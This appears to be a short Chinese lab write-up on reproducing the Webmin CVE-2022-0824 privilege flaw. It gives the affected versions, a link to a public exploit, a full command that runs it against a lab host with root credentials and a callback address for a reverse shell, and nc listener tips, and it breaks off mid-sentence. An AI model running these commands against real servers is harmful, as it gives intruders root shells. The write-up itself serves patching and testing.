Webmin reverse shell(CVE-2022-0824)

0X00.影响范围Webmin 1.984 及更低版本未配置任何文件管理器模块限制的特权较低的 Webmin 用户可以使用 root 权限访问文件（如果使用默认的”真实”主题）。所有具有其他不受信任的 Webmin 用户的系统都应立即升级。请注意，由于域所有者Webmin用户的配置方式，Virtualmin系统不受此错误的影响。webmin安全警告 (webmin.com)0X01.复现漏洞脚本https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshellVulfos拉一个webmin的镜像使用exp直接反弹shellpython3 Webmin-revshell.py -t https://172.16.3.137:26045 -c root:123456 -LS 172.16.3.136:9090 -L 172.16.3.136 -P 44440X02.Tips-t参数后加目标url 但是最后不能有/-LS是自己的IP+自定的端口，exp中会自动生成revshell.cgi，并且根据端口起一个web服务nc监听端口的时候要用nc -vlp 端口nc监听的另一个问题：不知道为啥，但是测着ubuntu18自带的nc没问题这种监听启起来是Listening o ………………………………